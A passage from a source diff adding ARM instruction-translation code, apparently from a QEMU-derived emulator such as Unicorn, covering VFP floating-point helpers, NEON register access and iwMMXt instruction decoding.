gen_exception(s, excp, syn); // qq + s->is_jmp = DISAS_JUMP; +} + +/* Force a TB lookup after an instruction that changes the CPU state. */ +static inline void gen_lookup_tb(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], s->pc & ~1); + s->is_jmp = DISAS_UPDATE; +} + +static inline void gen_add_data_offset(DisasContext *s, unsigned int insn, + TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int val, rm, shift, shiftop; + TCGv_i32 offset; + + if (!(insn & (1 << 25))) { + /* immediate */ + val = insn & 0xfff; + if (!(insn & (1 << 23))) + val = -val; + if (val != 0) + tcg_gen_addi_i32(tcg_ctx, var, var, val); + } else { + /* shift/register */ + rm = (insn) & 0xf; + shift = (insn >> 7) & 0x1f; + shiftop = (insn >> 5) & 3; + offset = load_reg(s, rm); + gen_arm_shift_im(s, offset, shiftop, shift, 0); + if (!(insn & (1 << 23))) + tcg_gen_sub_i32(tcg_ctx, var, var, offset); + else + tcg_gen_add_i32(tcg_ctx, var, var, offset); + tcg_temp_free_i32(tcg_ctx, offset); + } +} + +static inline void gen_add_datah_offset(DisasContext *s, unsigned int insn, + int extra, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int val, rm; + TCGv_i32 offset; + + if (insn & (1 << 22)) { + /* immediate */ + val = (insn & 0xf) | ((insn >> 4) & 0xf0); + if (!(insn & (1 << 23))) + val = -val; + val += extra; + if (val != 0) + tcg_gen_addi_i32(tcg_ctx, var, var, val); + } else { + /* register */ + if (extra) + tcg_gen_addi_i32(tcg_ctx, var, var, extra); + rm = (insn) & 0xf; + offset = load_reg(s, rm); + if (!(insn & (1 << 23))) + tcg_gen_sub_i32(tcg_ctx, var, var, offset); + else + tcg_gen_add_i32(tcg_ctx, var, var, offset); + tcg_temp_free_i32(tcg_ctx, offset); + } +} + +static TCGv_ptr get_fpstatus_ptr(DisasContext *s, int neon) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr statusptr = tcg_temp_new_ptr(tcg_ctx); + int offset; + if (neon) { + offset = offsetof(CPUARMState, vfp.standard_fp_status); + } else { + offset = offsetof(CPUARMState, vfp.fp_status); + } + tcg_gen_addi_ptr(tcg_ctx, statusptr, tcg_ctx->cpu_env, offset); + return statusptr; +} + +#define VFP_OP2(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, fpst); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, fpst); \ + } \ + tcg_temp_free_ptr(tcg_ctx, fpst); \ +} + +VFP_OP2(add) +VFP_OP2(sub) +VFP_OP2(mul) +VFP_OP2(div) + +#undef VFP_OP2 + +static inline void gen_vfp_F1_mul(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Like gen_vfp_mul() but put result in F1 */ + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + if (dp) { + gen_helper_vfp_muld(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, fpst); + } else { + gen_helper_vfp_muls(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, fpst); + } + tcg_temp_free_ptr(tcg_ctx, fpst); +} + +static inline void gen_vfp_F1_neg(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Like gen_vfp_neg() but put result in F1 */ + if (dp) { + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_F0d); + } else { + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_F0s); + } +} + +static inline void gen_vfp_abs(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_absd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + else + gen_helper_vfp_abss(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); +} + +static inline void gen_vfp_neg(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_negd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d); + else + gen_helper_vfp_negs(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s); +} + +static inline void gen_vfp_sqrt(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_sqrtd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env); + else + gen_helper_vfp_sqrts(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_cmp(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_cmpd(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env); + else + gen_helper_vfp_cmps(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_cmpe(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + gen_helper_vfp_cmped(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env); + else + gen_helper_vfp_cmpes(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env); +} + +static inline void gen_vfp_F1_ld0(DisasContext *s, int dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_F1d, 0); + else + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_F1s, 0); +} + +#define VFP_GEN_ITOF(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp, int neon) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0s, statusptr); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, statusptr); \ + } \ + tcg_temp_free_ptr(tcg_ctx, statusptr); \ +} + +VFP_GEN_ITOF(uito) +VFP_GEN_ITOF(sito) +#undef VFP_GEN_ITOF + +#define VFP_GEN_FTOI(name) \ +static inline void gen_vfp_##name(DisasContext *s, int dp, int neon) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \ + if (dp) { \ + gen_helper_vfp_##name##d(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0d, statusptr); \ + } else { \ + gen_helper_vfp_##name##s(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, statusptr); \ + } \ + tcg_temp_free_ptr(tcg_ctx, statusptr); \ +} + +VFP_GEN_FTOI(toui) +VFP_GEN_FTOI(touiz) +VFP_GEN_FTOI(tosi) +VFP_GEN_FTOI(tosiz) +#undef VFP_GEN_FTOI + +#define VFP_GEN_FIX(name, round) \ +static inline void gen_vfp_##name(DisasContext *s, int dp, int shift, int neon) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv_i32 tmp_shift = tcg_const_i32(tcg_ctx, shift); \ + TCGv_ptr statusptr = get_fpstatus_ptr(s, neon); \ + if (dp) { \ + gen_helper_vfp_##name##d##round(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_F0d, tmp_shift, \ + statusptr); \ + } else { \ + gen_helper_vfp_##name##s##round(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, tmp_shift, \ + statusptr); \ + } \ + tcg_temp_free_i32(tcg_ctx, tmp_shift); \ + tcg_temp_free_ptr(tcg_ctx, statusptr); \ +} +VFP_GEN_FIX(tosh, _round_to_zero) +VFP_GEN_FIX(tosl, _round_to_zero) +VFP_GEN_FIX(touh, _round_to_zero) +VFP_GEN_FIX(toul, _round_to_zero) +VFP_GEN_FIX(shto, ) +VFP_GEN_FIX(slto, ) +VFP_GEN_FIX(uhto, ) +VFP_GEN_FIX(ulto, ) +#undef VFP_GEN_FIX + +static inline void gen_vfp_ld(DisasContext *s, int dp, TCGv_i32 addr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) { + gen_aa32_ld64(s, tcg_ctx->cpu_F0d, addr, get_mem_index(s)); + } else { + gen_aa32_ld32u(s, tcg_ctx->cpu_F0s, addr, get_mem_index(s)); + } +} + +static inline void gen_vfp_st(DisasContext *s, int dp, TCGv_i32 addr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) { + gen_aa32_st64(s, tcg_ctx->cpu_F0d, addr, get_mem_index(s)); + } else { + gen_aa32_st32(s, tcg_ctx->cpu_F0s, addr, get_mem_index(s)); + } +} + +static inline long +vfp_reg_offset (int dp, int reg) +{ + if (dp) + return offsetof(CPUARMState, vfp.regs[reg]); + else if (reg & 1) { + return offsetof(CPUARMState, vfp.regs[reg >> 1]) + + offsetof(CPU_DoubleU, l.upper); + } else { + return offsetof(CPUARMState, vfp.regs[reg >> 1]) + + offsetof(CPU_DoubleU, l.lower); + } +} + +/* Return the offset of a 32-bit piece of a NEON register. + zero is the least significant end of the register. */ +static inline long +neon_reg_offset (int reg, int n) +{ + int sreg; + sreg = reg * 2 + n; + return vfp_reg_offset(0, sreg); +} + +static TCGv_i32 neon_load_reg(TCGContext *tcg_ctx, int reg, int pass) +{ + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); + return tmp; +} + +static void neon_store_reg(TCGContext *tcg_ctx, int reg, int pass, TCGv_i32 var) +{ + tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, neon_reg_offset(reg, pass)); + tcg_temp_free_i32(tcg_ctx, var); +} + +static inline void neon_load_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) +{ + tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); +} + +static inline void neon_store_reg64(TCGContext *tcg_ctx, TCGv_i64 var, int reg) +{ + tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, vfp_reg_offset(1, reg)); +} + +#define tcg_gen_ld_f32 tcg_gen_ld_i32 +#define tcg_gen_ld_f64 tcg_gen_ld_i64 +#define tcg_gen_st_f32 tcg_gen_st_i32 +#define tcg_gen_st_f64 tcg_gen_st_i64 + +static inline void gen_mov_F0_vreg(DisasContext *s, int dp, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + tcg_gen_ld_f64(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); + else + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); +} + +static inline void gen_mov_F1_vreg(DisasContext *s, int dp, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + tcg_gen_ld_f64(tcg_ctx, tcg_ctx->cpu_F1d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); + else + tcg_gen_ld_f32(tcg_ctx, tcg_ctx->cpu_F1s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); +} + +static inline void gen_mov_vreg_F0(DisasContext *s, int dp, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (dp) + tcg_gen_st_f64(tcg_ctx, tcg_ctx->cpu_F0d, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); + else + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, vfp_reg_offset(dp, reg)); +} + +#define ARM_CP_RW_BIT (1 << 20) + +static inline void iwmmxt_load_reg(DisasContext *s, TCGv_i64 var, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_ld_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); +} + +static inline void iwmmxt_store_reg(DisasContext *s, TCGv_i64 var, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_st_i64(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.regs[reg])); +} + +static inline TCGv_i32 iwmmxt_load_creg(DisasContext *s, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 var = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); + return var; +} + +static inline void iwmmxt_store_creg(DisasContext *s, int reg, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg])); + tcg_temp_free_i32(tcg_ctx, var); +} + +static inline void gen_op_iwmmxt_movq_wRn_M0(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_store_reg(s, tcg_ctx->cpu_M0, rn); +} + +static inline void gen_op_iwmmxt_movq_M0_wRn(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_load_reg(s, tcg_ctx->cpu_M0, rn); +} + +static inline void gen_op_iwmmxt_orq_M0_wRn(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); + tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); +} + +static inline void gen_op_iwmmxt_andq_M0_wRn(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); + tcg_gen_and_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); +} + +static inline void gen_op_iwmmxt_xorq_M0_wRn(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); + tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); +} + +#define IWMMXT_OP(name) \ +static inline void gen_op_iwmmxt_##name##_M0_wRn(DisasContext *s, int rn) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); \ + gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ +} + +#define IWMMXT_OP_ENV(name) \ +static inline void gen_op_iwmmxt_##name##_M0_wRn(DisasContext *s, int rn) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); \ + gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \ +} + +#define IWMMXT_OP_ENV_SIZE(name) \ +IWMMXT_OP_ENV(name##b) \ +IWMMXT_OP_ENV(name##w) \ +IWMMXT_OP_ENV(name##l) + +#define IWMMXT_OP_ENV1(name) \ +static inline void gen_op_iwmmxt_##name##_M0(DisasContext *s) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0); \ +} + +IWMMXT_OP(maddsq) +IWMMXT_OP(madduq) +IWMMXT_OP(sadb) +IWMMXT_OP(sadw) +IWMMXT_OP(mulslw) +IWMMXT_OP(mulshw) +IWMMXT_OP(mululw) +IWMMXT_OP(muluhw) +IWMMXT_OP(macsw) +IWMMXT_OP(macuw) + +IWMMXT_OP_ENV_SIZE(unpackl) +IWMMXT_OP_ENV_SIZE(unpackh) + +IWMMXT_OP_ENV1(unpacklub) +IWMMXT_OP_ENV1(unpackluw) +IWMMXT_OP_ENV1(unpacklul) +IWMMXT_OP_ENV1(unpackhub) +IWMMXT_OP_ENV1(unpackhuw) +IWMMXT_OP_ENV1(unpackhul) +IWMMXT_OP_ENV1(unpacklsb) +IWMMXT_OP_ENV1(unpacklsw) +IWMMXT_OP_ENV1(unpacklsl) +IWMMXT_OP_ENV1(unpackhsb) +IWMMXT_OP_ENV1(unpackhsw) +IWMMXT_OP_ENV1(unpackhsl) + +IWMMXT_OP_ENV_SIZE(cmpeq) +IWMMXT_OP_ENV_SIZE(cmpgtu) +IWMMXT_OP_ENV_SIZE(cmpgts) + +IWMMXT_OP_ENV_SIZE(mins) +IWMMXT_OP_ENV_SIZE(minu) +IWMMXT_OP_ENV_SIZE(maxs) +IWMMXT_OP_ENV_SIZE(maxu) + +IWMMXT_OP_ENV_SIZE(subn) +IWMMXT_OP_ENV_SIZE(addn) +IWMMXT_OP_ENV_SIZE(subu) +IWMMXT_OP_ENV_SIZE(addu) +IWMMXT_OP_ENV_SIZE(subs) +IWMMXT_OP_ENV_SIZE(adds) + +IWMMXT_OP_ENV(avgb0) +IWMMXT_OP_ENV(avgb1) +IWMMXT_OP_ENV(avgw0) +IWMMXT_OP_ENV(avgw1) + +IWMMXT_OP_ENV(packuw) +IWMMXT_OP_ENV(packul) +IWMMXT_OP_ENV(packuq) +IWMMXT_OP_ENV(packsw) +IWMMXT_OP_ENV(packsl) +IWMMXT_OP_ENV(packsq) + +static void gen_op_iwmmxt_set_mup(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tmp = load_cpu_field(s->uc, iwmmxt.cregs[ARM_IWMMXT_wCon]); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 2); + store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); +} + +static void gen_op_iwmmxt_set_cup(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tmp = load_cpu_field(s->uc, iwmmxt.cregs[ARM_IWMMXT_wCon]); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 1); + store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]); +} + +static void gen_op_iwmmxt_setpsr_nz(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_iwmmxt_setpsr_nz(tcg_ctx, tmp, tcg_ctx->cpu_M0); + store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCASF]); +} + +static inline void gen_op_iwmmxt_addl_M0_wRn(DisasContext *s, int rn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); + tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1); + tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); +} + +static inline int gen_iwmmxt_address(DisasContext *s, uint32_t insn, + TCGv_i32 dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd; + uint32_t offset; + TCGv_i32 tmp; + + rd = (insn >> 16) & 0xf; + tmp = load_reg(s, rd); + + offset = (insn & 0xff) << ((insn >> 7) & 2); + if (insn & (1 << 24)) { + /* Pre indexed */ + if (insn & (1 << 23)) + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + else + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0-offset); + tcg_gen_mov_i32(tcg_ctx, dest, tmp); + if (insn & (1 << 21)) + store_reg(s, rd, tmp); + else + tcg_temp_free_i32(tcg_ctx, tmp); + } else if (insn & (1 << 21)) { + /* Post indexed */ + tcg_gen_mov_i32(tcg_ctx, dest, tmp); + if (insn & (1 << 23)) + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset); + else + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0-offset); + store_reg(s, rd, tmp); + } else if (!(insn & (1 << 23))) + return 1; + return 0; +} + +static inline int gen_iwmmxt_shift(DisasContext *s, uint32_t insn, uint32_t mask, TCGv_i32 dest) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = (insn >> 0) & 0xf; + TCGv_i32 tmp; + + if (insn & (1 << 8)) { + if (rd < ARM_IWMMXT_wCGR0 || rd > ARM_IWMMXT_wCGR3) { + return 1; + } else { + tmp = iwmmxt_load_creg(s, rd); + } + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + iwmmxt_load_reg(s, tcg_ctx->cpu_V0, rd); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0); + } + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask); + tcg_gen_mov_i32(tcg_ctx, dest, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + return 0; +} + +/* Disassemble an iwMMXt instruction. Returns nonzero if an error occurred + (ie. an undefined instruction). */ +static int disas_iwmmxt_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd, wrd; + int rdhi, rdlo, rd0, rd1, i; + TCGv_i32 addr; + TCGv_i32 tmp, tmp2, tmp3; + + if ((insn & 0x0e000e00) == 0x0c000000) { + if ((insn & 0x0fe00ff0) == 0x0c400000) { + wrd = insn & 0xf; + rdlo = (insn >> 12) & 0xf; + rdhi = (insn >> 16) & 0xf; + if (insn & ARM_CP_RW_BIT) { /* TMRRC */ + iwmmxt_load_reg(s, tcg_ctx->cpu_V0, wrd); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); + } else { /* TMCRR */ + tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); + iwmmxt_store_reg(s, tcg_ctx->cpu_V0, wrd); + gen_op_iwmmxt_set_mup(s); + } + return 0; + } + + wrd = (insn >> 12) & 0xf; + addr = tcg_temp_new_i32(tcg_ctx); + if (gen_iwmmxt_address(s, insn, addr)) { + tcg_temp_free_i32(tcg_ctx, addr); + return 1; + } + if (insn & ARM_CP_RW_BIT) { + if ((insn >> 28) == 0xf) { /* WLDRW wCx */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + iwmmxt_store_creg(s, wrd, tmp); + } else { + i = 1; + if (insn & (1 << 8)) { + if (insn & (1 << 22)) { /* WLDRD */ + gen_aa32_ld64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); + i = 0; + } else { /* WLDRW wRd */ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + } + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 22)) { /* WLDRH */ + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + } else { /* WLDRB */ + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + } + } + if (i) { + tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_M0, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + } + } else { + if ((insn >> 28) == 0xf) { /* WSTRW wCx */ + tmp = iwmmxt_load_creg(s, wrd); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + } else { + gen_op_iwmmxt_movq_M0_wRn(s, wrd); + tmp = tcg_temp_new_i32(tcg_ctx); + if (insn & (1 << 8)) { + if (insn & (1 << 22)) { /* WSTRD */ + gen_aa32_st64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s)); + } else { /* WSTRW wRd */ + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + } + } else { + if (insn & (1 << 22)) { /* WSTRH */ + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + } else { /* WSTRB */ + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0); + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + } + } + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_temp_free_i32(tcg_ctx, addr); + return 0; + } + + if ((insn & 0x0f000000) != 0x0e000000) + return 1; + + switch (((insn >> 12) & 0xf00) | ((insn >> 4) & 0xff)) { + case 0x000: /* WOR */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 0) & 0xf; + rd1 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + gen_op_iwmmxt_orq_M0_wRn(s, rd1); + gen_op_iwmmxt_setpsr_nz(s); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x011: /* TMCR */ + if (insn & 0xf) + return 1; + rd = (insn >> 12) & 0xf; + wrd = (insn >> 16) & 0xf; + switch (wrd) { + case ARM_IWMMXT_wCID: + case ARM_IWMMXT_wCASF: + break; + case ARM_IWMMXT_wCon: + gen_op_iwmmxt_set_cup(s); + /* Fall through. */ + case ARM_IWMMXT_wCSSF: + tmp = iwmmxt_load_creg(s, wrd); + tmp2 = load_reg(s, rd); + tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + iwmmxt_store_creg(s, wrd, tmp); + break; + case ARM_IWMMXT_wCGR0: + case ARM_IWMMXT_wCGR1: + case ARM_IWMMXT_wCGR2: + case ARM_IWMMXT_wCGR3: + gen_op_iwmmxt_set_cup(s); + tmp = load_reg(s, rd); + iwmmxt_store_creg(s, wrd, tmp); + break; + default: + return 1; + } + break; + case 0x100: /* WXOR */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 0) & 0xf; + rd1 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + gen_op_iwmmxt_xorq_M0_wRn(s, rd1); + gen_op_iwmmxt_setpsr_nz(s); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x111: /* TMRC */ + if (insn & 0xf) + return 1; + rd = (insn >> 12) & 0xf; + wrd = (insn >> 16) & 0xf; + tmp = iwmmxt_load_creg(s, wrd); + store_reg(s, rd, tmp); + break; + case 0x300: /* WANDN */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 0) & 0xf; + rd1 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + tcg_gen_neg_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0); + gen_op_iwmmxt_andq_M0_wRn(s, rd1); + gen_op_iwmmxt_setpsr_nz(s); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x200: /* WAND */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 0) & 0xf; + rd1 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + gen_op_iwmmxt_andq_M0_wRn(s, rd1); + gen_op_iwmmxt_setpsr_nz(s); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + gen_op_iwmmxt_set_cup(s); + break; + case 0x810: case 0xa10: /* WMADD */ + wrd = (insn >> 12) & 0xf; + rd0 = (insn >> 0) & 0xf; + rd1 = (insn >> 16) & 0xf; + gen_op_iwmmxt_movq_M0_wRn(s, rd0); + if (insn & (1 << 21)) + gen_op_iwmmxt_maddsq_M0_wRn(s, rd1); + else + gen_op_iwmmxt_madduq_M0_wRn(s, rd1); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + case 0x10e: case 0x50e: case 0x90e: case 0xd0e: /* WUNPCKIL */ + wrd = (insn >> 